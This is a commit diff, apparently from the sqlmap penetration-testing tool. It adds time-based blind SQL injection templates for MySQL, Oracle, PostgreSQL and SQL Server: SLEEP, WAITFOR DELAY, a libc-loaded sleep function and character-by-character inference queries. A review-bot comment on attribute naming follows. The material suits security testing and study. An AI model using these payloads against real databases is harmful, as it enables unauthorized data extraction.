Initial implementation of support for stacked queries.

Added a method to test for time-based blind SQL injection by stacking, on the affected parameter, a SLEEP() or similar DBMS-specific function.
Adapted libraries, plugins and XML with the above changes.
Minor layout adjustments.
This commit is contained in:
Bernardo Damele
2008-11-12 00:36:50 +00:00
parent 13f76cfe3b
commit 81ed7c2086
12 changed files with 185 additions and 95 deletions


@@ -14,6 +14,15 @@
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="#" query2="/*"/>
<!--
NOTE: In PHP the mysql_query() function does not permit query stacking, or executing multiple queries in a single function call.
MySQL 5.0.12 introduced SLEEP() function
References:
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-12.html
* http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_sleep
-->
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(1000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="VERSION()"/>
@@ -62,6 +71,8 @@
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="SELECT UTL_INADDR.get_host_name('10.0.0.%d') FROM DUAL"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
@@ -109,6 +120,8 @@
<limitstring query=" OFFSET "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2="/*"/>
<timedelay query="SELECT pg_sleep(%d)" query2="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="VERSION()"/>
@@ -157,6 +170,8 @@
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2="/*"/>
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="@@VERSION"/>
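Review bot: The new `query2` attribute carries a different meaning in every DBMS block, and only the MySQL block (the comment above its `timedelay` element in the first hunk) says when the alternative applies; the Oracle, PostgreSQL and Microsoft SQL Server hunks add their `timedelay` elements with no such note, so a reader of the XML cannot tell whether `query2` is a fallback for older versions, a fallback for missing privileges, or an unrelated technique. The MySQL and Oracle alternatives also appear to place `%d` where it does not control the duration (the BENCHMARK iteration count is hard-coded and the Oracle value only changes a host name), which is worth stating explicitly so callers do not treat the observed delay as proportional to the requested seconds. I would add a short comment before each of the three new `timedelay` elements, modelled on the MySQL one, stating the precondition under which `query` is expected to work and what `query2` is for, e.g. `<!-- query2 is an alternative when the primary delay function is unavailable; its %d does not scale the delay -->` where that holds. Longer term, a numbered attribute suffix (`query`, `query2`) is the XML "structure in names" anti-pattern; repeated child elements with a `when`-style attribute would let the loader pick the right one without convention, but that is a schema change beyond this commit. Each `timedelay` sits inside an enclosing DBMS element whose start and end tags are outside these hunks.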